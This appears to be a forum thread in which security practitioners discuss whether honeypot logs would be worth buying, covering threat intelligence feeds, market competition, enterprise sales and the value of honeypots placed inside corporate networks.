I work within the security operations team of a major global service company, working with private businesses, local, regional and civil government.

Our main pain point is never information - we can get that in spades. Our pet Unix engineer is constantly finding interesting new feeds for us, and I spend a notable amount of time each week keeping up to date with latest developments and any new information sources that crop up.

The challenge is translating this information into sound, actionable, intelligence that measurably provides value to our business and customers. Raw logs of random honeypots are of no interest to us, and if we wanted such a thing we could roll our own relatively easily.

Honeypots based outside of our organization would only be of interest in a few limited scenarios: Firstly, when a major new vulnerability lands it would be invaluable to know right from the start what sort of attacks are being seen in the wild. Ideally it would also be able to look back in time and discover if this zero-day being exploited prior to the vulnerability. Secondly, what we couldn't do is set up honeypots in multiple different sectors and compare attack profiles - eg, between a hospitality company and say a local council.

In both those cases though, what we would want is the results of the analysis and expert recommendations, not the raw logs.

As others have already suggested, what we would be very interested in is honeypots-as-a-service: Being able to drop a fake finance server into our estate and detect access attempts. Create a fake company division website and see who tries to attack it and how. Be alerted to targeted attacks before they actually entire the production estate.

Something I'm fond of saying is that whenever an investigation or assessment is performed, what actually earns you the money is the report at the end. That report and the actionable intelligence within is your product, not the tool you use to generate it.

I would suggest startups are the wrong area. Startups barely have money to pay for staff and often don't know or care about their security risk. They also tend to use tools which allay some of that risk (eg: Stripe, etc for credit cards, non-storage of PCI-Compliant data). Mid-Sized companies often have sensitive data, older techniques, and/or budget - and can be convinced of their risk. I would suggest going the routes of medium size business up to lower Fortune 3000 companies. Reason, the CISO position is increasingly going to those in security with Penetration background rather than other areas of sercurity (eg: physical, Identity & Access, etc). You might look at a strategy similar to http://Phishme.com which is selling into larger accounts.

[my background: used to implement and sell security into Fortune 1000 account and SMB's]

Do you have any ideas as to how to gather budget to release a business on a bigger scale?

Security is an odd area. In selling (and implementing products), as well as helping a friend launch his Cloud security business - the market has a huge issue for startups if your approach it incorrectly. As opposed to areas ripe for SaaS penetration, security solving traditional or incremental problems face a large resistance because buyers/stakeholders "won't get fired for choosing Netegrity/Oracle/<largeco>" if something goes wrong. They can always blame it on the consultant implementation team. Plus, there's a large risk to an organization using a new player to solve an old problem. Phishme (not associated, but have friends who know them) took a new approach (email phishing) which wasn't offered by large players. We found this out a hard way in a startup, along with long sales cycles and requirements. For a security offering, the Mach37 accelerator can be a good place to start.

I can't answer about whether I'd buy it (I'm not in that market) but you should know that the competition in the space you're considering is, or at least was, pretty fierce. Vendors you should look at include iDefense, TippingPoint, Arbor, and Symantec.

I think this would be a tough sell in enterprise environments because the analysis of log data takes time and analysts are likely to say they have enough data from their own logs. They would also get stuck on the differences between the honeypot environment and their own network.

That said, it would be valuable if I wanted to blacklist certain IP addresses.

You may also consider a data sharing service that would provide access to anonymized log data shared among subscribers, this would allow subscribers to get data from real systems. Some vendors market similar services (such as RSA's eFraud Network).

I work in security for a large financial firm and demo enterprise products like these pretty frequently.

My answer to this would be a simple "no". Obtaining and structuring honeypot logs is not hard, and is basically a solved problem. This falls under the greater umbrella of "threat intelligence", and there are a ton of open source and enterprise solutions for threat intelligence feeds and collection. You would have extremely contentious competition, plus odds are a lot of what you're doing can also be done by an in-house analyst with some Python skills and access to public and private feeds.

Some sort of significant value would have to be added on top of the logs, and no, not just categorizing or grouping or ranking the logs.

If it's still honeypots you're interested in, then a better idea may be to offer an "active defense" honeypot service to get early warning on targeted attackers. This can include things like decoy/trap email accounts, web and network services, documents, and more.

Some startups are in this space, but it's a pretty immature field. It also has a lot of problems because many top managers and execs feel very uncomfortable with the idea. My own company has discussed it before but management has declined due to legal concerns, and also the concern that baiting an attacker may make you more of a target.

But I feel this area may be ripe for disruption. Get a few of the big names doing things like this and it's easy to convince smaller companies in the same vertical to do it as well. Actually, some big names may already be doing it, but if they are they're probably hush-hush about it.

In summary: honeypots sitting open on the Internet offer some interesting intelligence, but the honeypot you run and the honeypot anyone else runs will generate roughly the same intelligence and logs. And a lot of these logs are already converted into network indicators and rolled into hundreds of threat intelligence feeds that many security departments are already consuming. You won't be able to generate a lot of value by running and processing your own personal honeypots, in fact I would consider it a massive waste of time from a product or service perspective (though running one certainly is educational and can be fun).

But a honeypot sitting within an enterprise network/domain can be very useful and very valuable to a company. If you provide such a service, I would recommend it as a software suite set up by the client, definitely not as a cloud service.

This service may be useful to security companies and security researchers or analysts, and for them it shouldn't be hard to get this type of data.

A better service would be to embed somehow honeypots into the client's infrastructure and deduce customized actions in a mostly automated, semi-supervised way.

The problem with security logs (and logs in general) is that they are hard to take specific actions on. I don't even recommend installing an IDS like Snort to most people; you see lots of automated intrusion attempts, almost all just fishing for a vulnerability in an application that you don't even have , now what, are you going to dedicate someone to go through them and see if the infrastructure is vulnerable to them?

> dedicate someone to go through them and see if the infrastructure is vulnerable to them?

No - Somebody has just done that for you, for free.

This is a space I spend an enormous amount of time in, so it sounded interesting.... then I didn't get it.

Honeypot logs aren't really interesting - since I don't care what happens inside them. Now, if you could embed your honeypots as a service with companies, and get them to accept data sharing, that's more interesting. If you can somehow integrate the results or share things with Team Cymru or VXShare, it becomes a lot more interesting.

But the thing is - I already get a lot of that value from cuckoosandbox - and more recently elastic-cuckooo. https://github.com/drainware/elastic-cuckoo.

I would use Tilt to quickly test to see if people would buy into the concept. https://www.tilt.com/campaigns/new?sell=1

Checking it out, thanks

Charge for them to be searchable. That way, people can lookup strings or patterns being sent to their server and see what attacks they match up against.

Honeypot logs? No.

Analysis and consumables pulled from the logs? Maybe.

Say you provided block lists for smtp/ssh/http which were actively updated, firewall rules, log filters, packet capture filters, &c to help find and prevent some of the illicit traffic on my own network.

For example, when shellshock was around several people posted grep strings to tease attack attempts out of apache logs.

> Analysis and consumables pulled from the logs? Maybe

But this exists already in a form of RBL/PBL/XBL/etc. Not that it cannot be done better, e.g. for smoother integration into existing perimeter security systems, but it exists nonetheless and it's free.

Agree with cz. Put that in a box that plugs into a wall and gets warm and sell it tor 30k to enterprise companies, and you could have a product.

I agree - but 99% of Fortune 1500+ companies do not have the staff or knowledge in how to implement, analyze, operate these.

It'd be more interesting if there was service which analyzed the client's logs and recommended specific action (per client), with the unique insight gained by your honeypot network. Something like an API which you hooked up with your infrastructure, fed logs into it, and got periodical security recommendations and alerts in return.

Is the eMail in your profile active and working? I have something for you

Yes

Honeypots have high value when embedded in high value networks.

no, can't say i would. i don't see what the benefit would be

Good to know. :)

This has been very interesting, thank you all for your feedback.